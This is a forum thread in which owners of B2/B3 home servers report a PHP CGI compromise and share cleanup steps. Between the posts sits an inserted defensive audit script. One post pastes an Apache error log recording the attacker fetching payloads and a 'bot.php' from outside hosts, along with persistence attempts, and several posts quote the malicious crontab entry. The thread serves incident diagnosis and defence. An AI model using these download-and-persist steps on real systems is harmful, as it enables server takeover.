
I have been attacked and don't know why.

Got problems with your B2 or B3? Share and get helped!
Binkem
Posts: 388
Joined: 10 Jul 2008, 02:26

Re: I have been attacked and don't know why.

Post by Binkem »

Hi,

I'm finding the
<b>Security Alert!</b> The PHP CGI cannot be accessed directly.
lines in my error.log. I cannot find any cronjobs on my B3 (typing crontab -e as www-data, root and myself).

Does this mean that I'm not (yet) infected? Or am I looking in the wrong place?

Martijn
Ubi
Posts: 1549
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi »

They got me as well... I found an entry to stablehost.us in the crontab for www-data
and two hidden files in /dev/shm/ that contained the malware payload.

:(
Ubi
Posts: 1549
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi »

So why exactly does www-data have a valid shell on the B3?
RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername »

I was wondering the same thing myself. I checked my /dev/shm and there are no hidden files there.
toukie
Posts: 115
Joined: 13 Jan 2012, 12:22

Re: I have been attacked and don't know why.

Post by toukie »

Same stuff in logs here plus this in crontab www-data:
* * * * * /tmp/.UNIX/update >/dev/null 2>&1
Ubi
Posts: 1549
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi »

so I guess it's safe to say there are multiple attacks that use the same point of entry, but have a slightly different payload.
RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername »

Seems odd that we would all be victims. I wonder if someone is targeting all hosts at myownb3.com.
Gordon
Posts: 1461
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon »

RandomUsername wrote:Seems odd that we would all be victims. I wonder if someone is targeting all hosts at myownb3.com.
Not likely. I see similar attempts on my B3 and I can state for a fact that they are not using the myownb3 host names.
toukie
Posts: 115
Joined: 13 Jan 2012, 12:22

Re: I have been attacked and don't know why.

Post by toukie »

What is the fix for this?

I have ". .. network" in /dev/shm. What does that say?
Puma
Posts: 230
Joined: 29 Sep 2008, 06:30

Re: I have been attacked and don't know why.

Post by Puma »

Hello,

Under attack as well.

How can I check the cron job for www-data??

In my error log I found:

[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: c:windowssystem32cmd.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] %TEMP%x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: bitsadmin: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ftp: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: del: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/lol
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- ftp://ftp:*password*@80.79.48.186/bot.php
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] => `bot.php'
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 80.79.48.186:21...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/c
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logging in as ftp ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logged in!
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ==> SYST ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] done. ==> PWD ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> TYPE I ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> CWD not needed.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> SIZE bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 15138
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> PASV ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> RETR bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] Length: 15138 (15K) (unauthoritative)
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 0K ..
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] . .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .. 100% 158K=0.09s
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:01 (158 KB/s) - `bot.php' saved [15138]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 6906 (6.7K) [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `lol'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K .
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 256 [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `c'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K 100% 8.55M=0s
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:04 (8.55 MB/s) - `c' saved [256/256]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:05-- http://74.52.9.186/a
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] ..
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] . 100% 3.33K=2.0s
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:06 (3.33 KB/s) - `lol' saved [6906/6906]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 1:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] \x7fELF\x01\x01\x01\x02\x03\x01\xb8%@44: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 2:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ,\xe3\x8a\x10^=^=^=\x14\x15\x02\xfb\xff\xff\xff#!/usr/bin/perl: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 5: Syntax error: "(" unexpected
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Length: 712 [text/plain]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Saving to: `a'
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 0K 100% 21.4M=0s
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:14 (21.4 MB/s) - `a' saved [712/712]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] no crontab for www-data
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:14-- http://74.52.9.186/update
[Sun Nov 03 14:43:24 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Length: 208 [text/plain]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Saving to: `update'
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 0K 100% 6.40M=0s
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:28 (6.40 MB/s) - `update' saved [208/208]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] cp: cannot create regular file `/etc/cron.hourly/update': Permission denied
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: No such file or directory while trying to stat bash
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on dmgshm
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Operation not supported while reading flags on ftdaemon
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-hdroogers
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-root
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on shallalist.tar
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:28-- http://74.52.9.186/clamav
[Sun Nov 03 14:43:30 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Length: 379680 (371K) [text/plain]
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Saving to: `clamav'
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:40 2013] [error] [client 37.187.77.137] 0K .......... .......... .......... .......... .......... 13% 8.69K 37s
[Sun Nov 03 14:43:45 2013] [error] [client 37.187.77.137] 50K .......... .......... .......... .......... .......... 26% 10.4K 29s
[Sun Nov 03 14:43:51 2013] [error] [client 37.187.77.137] 100K .......... .......... .......... .......... .......... 40% 8.04K 25s
[Sun Nov 03 14:43:57 2013] [error] [client 37.187.77.137] 150K .......... .......... .......... .......... .......... 53% 8.25K 19s
[Sun Nov 03 14:44:07 2013] [error] [client 37.187.77.137] 200K .......... .......... .......... .......... .......... 67% 5.24K 16s
[Sun Nov 03 14:44:20 2013] [error] [client 37.187.77.137] 250K .......... .......... .......... .......... .......... 80% 3.92K 11s
[Sun Nov 03 14:44:28 2013] [error] [client 37.187.77.137] 300K .......... .......... .......... .......... .......... 94% 5.38K 3s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 350K .......... .......... 100% 9.49K=57s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 2013-11-03 14:44:31 (6.55 KB/s) - `clamav' saved [379680/379680]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 19: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 20: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] ./bash: 1: Syntax error: "(" unexpected
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] chattr: Operation not permitted while setting flags on bash
[Sun Nov 03 14:48:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Sun Nov 03 14:48:01 2013] [error] [client 37.187.77.137] Script timed out before returning headers: php
[Sun Nov 03 14:53:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
I think this is not OK... FTP access was not enabled!!

What can I do best?

Puma
Last edited by Puma on 03 Nov 2013, 14:26, edited 1 time in total.
Linux is like a wigwam - no windows, no gates, apache inside!
DanielM
Posts: 637
Joined: 28 Mar 2008, 06:37
Location: Sweden

Re: I have been attacked and don't know why.

Post by DanielM »

RandomUsername wrote:Seems odd that we would all be victims. I wonder if someone is targeting all hosts at myownb3.com.
Nope. I have my own .se domain, I've never used myownb3.com.

I'm in Sweden, on dynamic IP (I've had the same IP for some years now though). The IP is 88.206.x.x, I doubt that anyone else here is in the same range.

I'm out of guesses now, but it sure doesn't feel like coincidence...

/Daniel
DanielM
Posts: 637
Joined: 28 Mar 2008, 06:37
Location: Sweden

Re: I have been attacked and don't know why.

Post by DanielM »

Puma wrote:How can I check the cron job for www-data??
You can (logged in as root) do either "crontab -u www-data -l" to list all cron jobs for www-data or "crontab -u www-data -e" to open up an editor (I think you'll get nano) for the jobs. Just delete the rows that shouldn't be there and save with ctrl-x. You might want to take a copy of the rows first so that you can check what they did.

/Daniel
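The checks described in this thread (the www-data crontab, hidden files in /dev/shm and /tmp, and the PHP CGI "Security Alert!" lines in error.log) collected into one script. This is an added example, not code from the thread or from Excito; it assumes a Debian-style layout with Apache's log at /var/log/apache2/error.log, and the sample crontab and log lines at the bottom are constructed for the demo (the 192.0.2.44 address is a made-up documentation address).

```shell
#!/bin/sh
# Added example: audit helpers for a B3 owner, run as root for the live checks.

# 1. Crontab entries that run something out of a world-writable scratch dir
#    (the "* * * * * /tmp/.UNIX/update" line from the thread is the pattern).
#    Reads crontab text on stdin, prints matches, returns 0 only if any matched.
suspicious_cron_lines() {
    grep -E '^[[:space:]]*[^#].*(/tmp/|/var/tmp/|/dev/shm/)'
}

# 2. Hidden entries in a scratch directory. "ls -a" always prints "." and "..",
#    so ". .. network" in /dev/shm is clean; -mindepth 1 skips those two.
hidden_files_in() {
    find "$1" -mindepth 1 -name '.*' 2>/dev/null
}

# 3. How many PHP-CGI "Security Alert!" lines the error log holds (stdin),
#    and which client addresses produced them, most frequent first.
count_cgi_alerts() {
    grep -c 'The PHP CGI cannot be accessed directly' || true
}
cgi_alert_clients() {
    grep 'The PHP CGI cannot be accessed directly' \
      | sed -n 's/.*\[client \([0-9.]*\)\].*/\1/p' | sort | uniq -c | sort -rn
}

# Live run on the box itself: sh audit.sh --live (needs root for crontab -u).
audit_live() {
    echo "== www-data crontab entries in scratch dirs =="
    crontab -u www-data -l 2>/dev/null | suspicious_cron_lines || echo "(none)"
    for d in /dev/shm /tmp /var/tmp; do
        echo "== hidden entries in $d =="
        hidden_files_in "$d"
    done
    echo "== PHP CGI alerts in error.log =="
    count_cgi_alerts < /var/log/apache2/error.log
    cgi_alert_clients < /var/log/apache2/error.log
}

# Constructed sample input, so the helpers can be exercised offline.
SAMPLE_CRON='# m h dom mon dow command
* * * * * /tmp/.UNIX/update >/dev/null 2>&1
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf'
SAMPLE_LOG='[Sun Nov 03 14:42:59 2013] [error] [client 37.187.77.137] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 15:01:10 2013] [error] [client 192.0.2.44] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Sun Nov 03 15:01:10 2013] [error] [client 37.187.77.137] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.'

case "${1:-}" in
    --live) audit_live ;;
    *) printf '%s\n' "$SAMPLE_CRON" | suspicious_cron_lines
       printf '%s\n' "$SAMPLE_LOG" | cgi_alert_clients ;;
esac
```

Without --live the script only runs the helpers over the constructed sample, so you can check what they flag before pointing them at a real crontab and log.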
Puma
Posts: 230
Joined: 29 Sep 2008, 06:30

Re: I have been attacked and don't know why.

Post by Puma »

Thanks Daniel,

Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab

seems we all are attacked!

Puma
Linux is like a wigwam - no windows, no gates, apache inside!
Gordon
Posts: 1461
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon »

Puma wrote:Thanks Daniel,

Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab

seems we all are attacked!

Puma
That sounds a bit like jumping to conclusions to me. Also, on my B3 I do not have the exact same log entries as quoted here, but that may be the result of my webserver not responding correctly for this exploit (I do not have Apache running on the exposed B3, but Nginx).
However, if all of you can match times at which the attacks occurred, that could point to someone being able to access the logs of either this forum or the Excito update site.
Puma
Posts: 230
Joined: 29 Sep 2008, 06:30

Re: I have been attacked and don't know why.

Post by Puma »

You're probably right.

My father's B2 was not attacked (vs 2.6 uses update but not forum)
My brother-in-law's B3 was not attacked (vs 2.5 without forum)

Can Excito check the access to the logs?

Are there countermeasures which we can take other than deleting www-data cron jobs and/or /tmp entries?

Puma
Linux is like a wigwam - no windows, no gates, apache inside!